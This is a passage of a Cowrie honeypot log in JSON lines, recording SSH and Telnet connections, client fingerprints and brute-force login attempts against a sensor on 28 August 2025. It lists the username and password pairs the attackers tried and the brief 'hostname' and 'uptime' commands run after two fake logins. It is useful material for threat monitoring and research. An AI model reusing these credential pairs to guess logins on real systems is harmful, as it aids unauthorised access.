-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:07:56.216069Z","src_ip":"212.227.235.229","session":"419c4c442958"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T23:07:56.516953Z","src_ip":"212.227.235.229","session":"419c4c442958"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:07:57.618656Z","src_ip":"212.227.235.229","session":"419c4c442958"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":22985,"dst_ip":"1.2.3.4","dst_port":22,"session":"f91b96bd895b","protocol":"ssh","message":"New connection: 186.225.142.90:22985 (1.2.3.4:22) [session: f91b96bd895b]","sensor":"my-vps","timestamp":"2025-08-28T23:08:05.435216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:08:05.436737Z","src_ip":"186.225.142.90","session":"f91b96bd895b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:08:05.628116Z","src_ip":"186.225.142.90","session":"f91b96bd895b"}
{"eventid":"cowrie.login.success","username":"root","password":"110852*!111111","message":"login attempt [root/110852*!111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:08:06.207456Z","src_ip":"186.225.142.90","session":"f91b96bd895b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:08:07.069302Z","src_ip":"186.225.142.90","session":"f91b96bd895b"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T23:08:07.070411Z","src_ip":"186.225.142.90","session":"f91b96bd895b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:08:07.270182Z","src_ip":"186.225.142.90","session":"f91b96bd895b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:08:07.275539Z","src_ip":"186.225.142.90","session":"f91b96bd895b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32382,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1de082896fc","protocol":"ssh","message":"New connection: 212.227.125.160:32382 (1.2.3.4:22) [session: a1de082896fc]","sensor":"my-vps","timestamp":"2025-08-28T23:08:12.162149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:08:12.163349Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:08:12.251836Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Password123","message":"login attempt [admin/Password123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:08:12.659014Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"lab","message":"login attempt [admin/lab] failed","sensor":"my-vps","timestamp":"2025-08-28T23:08:13.752093Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-28T23:08:14.834521Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0","message":"login attempt [admin/0] failed","sensor":"my-vps","timestamp":"2025-08-28T23:08:15.918032Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"8EjTlr35SVMd","message":"login attempt [admin/8EjTlr35SVMd] failed","sensor":"my-vps","timestamp":"2025-08-28T23:08:17.000764Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:08:18.084278Z","src_ip":"212.227.125.160","session":"a1de082896fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59050,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a3977dcda02","protocol":"telnet","message":"New connection: 212.227.125.160:59050 (1.2.3.4:23) [session: 4a3977dcda02]","sensor":"my-vps","timestamp":"2025-08-28T23:08:54.532660Z"}
{"eventid":"cowrie.session.connect","src_ip":"115.207.170.184","src_port":36547,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed4759ca9d22","protocol":"telnet","message":"New connection: 115.207.170.184:36547 (1.2.3.4:23) [session: ed4759ca9d22]","sensor":"my-vps","timestamp":"2025-08-28T23:09:03.188711Z"}
{"eventid":"cowrie.session.closed","duration":17.15460753440857,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:09:11.686782Z","src_ip":"212.227.125.160","session":"4a3977dcda02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59512,"dst_ip":"1.2.3.4","dst_port":23,"session":"247356c861cd","protocol":"telnet","message":"New connection: 212.227.235.229:59512 (1.2.3.4:23) [session: 247356c861cd]","sensor":"my-vps","timestamp":"2025-08-28T23:09:12.799837Z"}
{"eventid":"cowrie.session.closed","duration":0.0013456344604492188,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:09:12.801066Z","src_ip":"212.227.235.229","session":"247356c861cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37168,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab95b899291c","protocol":"telnet","message":"New connection: 212.227.125.160:37168 (1.2.3.4:23) [session: ab95b899291c]","sensor":"my-vps","timestamp":"2025-08-28T23:09:15.747005Z"}
{"eventid":"cowrie.session.closed","duration":13.447624206542969,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:09:16.636269Z","src_ip":"115.207.170.184","session":"ed4759ca9d22"}
{"eventid":"cowrie.session.closed","duration":3.3239216804504395,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:09:19.070849Z","src_ip":"212.227.125.160","session":"ab95b899291c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40196,"dst_ip":"1.2.3.4","dst_port":23,"session":"d78c97a132e4","protocol":"telnet","message":"New connection: 212.227.125.160:40196 (1.2.3.4:23) [session: d78c97a132e4]","sensor":"my-vps","timestamp":"2025-08-28T23:09:23.428443Z"}
{"eventid":"cowrie.session.closed","duration":10.279966831207275,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:09:33.708341Z","src_ip":"212.227.125.160","session":"d78c97a132e4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64548,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aae24cab427","protocol":"ssh","message":"New connection: 217.72.205.35:64548 (1.2.3.4:22) [session: 6aae24cab427]","sensor":"my-vps","timestamp":"2025-08-28T23:10:03.133116Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:10:03.134264Z","src_ip":"217.72.205.35","session":"6aae24cab427"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54768,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f19ba7a9512","protocol":"ssh","message":"New connection: 212.227.125.160:54768 (1.2.3.4:22) [session: 5f19ba7a9512]","sensor":"my-vps","timestamp":"2025-08-28T23:11:21.856070Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u000f\u001d1ZX\\xa0\\xcd \\xa9\\xe6Z>0\\xe1\\xd8\\\\xa4\\xc2\u066602elO\\xe46\u001c\\xcbM\\xa4\\xe9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u000f\u001d1ZX\\xa0\\xcd \\xa9\\xe6Z>0\\xe1\\xd8\\\\xa4\\xc2\u066602elO\\xe46\u001c\\xcbM\\xa4\\xe9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T23:11:21.857109Z","src_ip":"212.227.125.160","session":"5f19ba7a9512"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:11:21.858693Z","src_ip":"212.227.125.160","session":"5f19ba7a9512"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34712,"dst_ip":"1.2.3.4","dst_port":22,"session":"e800ba3966d6","protocol":"ssh","message":"New connection: 212.227.125.160:34712 (1.2.3.4:22) [session: e800ba3966d6]","sensor":"my-vps","timestamp":"2025-08-28T23:11:30.218347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:11:30.346793Z","src_ip":"212.227.125.160","session":"e800ba3966d6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T23:11:30.557974Z","src_ip":"212.227.125.160","session":"e800ba3966d6"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:11:40.347088Z","src_ip":"212.227.125.160","session":"e800ba3966d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43928,"dst_ip":"1.2.3.4","dst_port":22,"session":"de5e6cceb032","protocol":"ssh","message":"New connection: 212.227.125.160:43928 (1.2.3.4:22) [session: de5e6cceb032]","sensor":"my-vps","timestamp":"2025-08-28T23:11:57.383132Z"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:12:01.335715Z","src_ip":"212.227.125.160","session":"de5e6cceb032"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38312,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb9f9860a09d","protocol":"ssh","message":"New connection: 212.227.125.160:38312 (1.2.3.4:22) [session: cb9f9860a09d]","sensor":"my-vps","timestamp":"2025-08-28T23:12:10.289832Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xe7_\u0000T\\xf2\\xb4va;\\x87\\x9a4\\xee\u000b\\xe9\\xf4\\xa0?\\x8d\\xa9j%\\xf9\\xc0B\\xe2c\u0157\\xe2\u06bd\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xe7_\u0000T\\xf2\\xb4va;\\x87\\x9a4\\xee\u000b\\xe9\\xf4\\xa0?\\x8d\\xa9j%\\xf9\\xc0B\\xe2c\u0157\\xe2\u06bd\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T23:12:10.290878Z","src_ip":"212.227.125.160","session":"cb9f9860a09d"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:12:10.291845Z","src_ip":"212.227.125.160","session":"cb9f9860a09d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50550,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d5f7d05abbf","protocol":"ssh","message":"New connection: 201.148.180.50:50550 (1.2.3.4:22) [session: 7d5f7d05abbf]","sensor":"my-vps","timestamp":"2025-08-28T23:12:12.552978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:12:13.286613Z","src_ip":"201.148.180.50","session":"7d5f7d05abbf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:12:13.287862Z","src_ip":"201.148.180.50","session":"7d5f7d05abbf"}
{"eventid":"cowrie.login.success","username":"root","password":"123123","message":"login attempt [root/123123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:12:25.517226Z","src_ip":"201.148.180.50","session":"7d5f7d05abbf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:12:32.978194Z","src_ip":"201.148.180.50","session":"7d5f7d05abbf"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T23:12:32.978947Z","src_ip":"201.148.180.50","session":"7d5f7d05abbf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:12:34.145172Z","src_ip":"201.148.180.50","session":"7d5f7d05abbf"}
{"eventid":"cowrie.session.closed","duration":"21.6","message":"Connection lost after 21.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:12:34.146268Z","src_ip":"201.148.180.50","session":"7d5f7d05abbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33658,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3dd3c445dff","protocol":"ssh","message":"New connection: 212.227.125.160:33658 (1.2.3.4:22) [session: c3dd3c445dff]","sensor":"my-vps","timestamp":"2025-08-28T23:14:08.281259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:14:08.356792Z","src_ip":"212.227.125.160","session":"c3dd3c445dff"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T23:14:08.357729Z","src_ip":"212.227.125.160","session":"c3dd3c445dff"}
{"eventid":"cowrie.login.failed","username":"pfsense","password":"pfsense","message":"login attempt [pfsense/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T23:14:08.780418Z","src_ip":"212.227.125.160","session":"c3dd3c445dff"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:14:09.874718Z","src_ip":"212.227.125.160","session":"c3dd3c445dff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63265,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f394e17fdc4","protocol":"ssh","message":"New connection: 212.227.125.160:63265 (1.2.3.4:22) [session: 0f394e17fdc4]","sensor":"my-vps","timestamp":"2025-08-28T23:15:48.447248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:15:48.448337Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:15:48.532646Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna","message":"login attempt [alanna/alanna] failed","sensor":"my-vps","timestamp":"2025-08-28T23:15:48.955137Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna1","message":"login attempt [alanna/alanna1] failed","sensor":"my-vps","timestamp":"2025-08-28T23:15:50.041867Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna123","message":"login attempt [alanna/alanna123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:15:51.128685Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna1234","message":"login attempt [alanna/alanna1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:15:52.214917Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
{"eventid":"cowrie.login.failed","username":"alanna","password":"alanna12345","message":"login attempt [alanna/alanna12345] failed","sensor":"my-vps","timestamp":"2025-08-28T23:15:53.302637Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:15:54.389088Z","src_ip":"212.227.125.160","session":"0f394e17fdc4"}
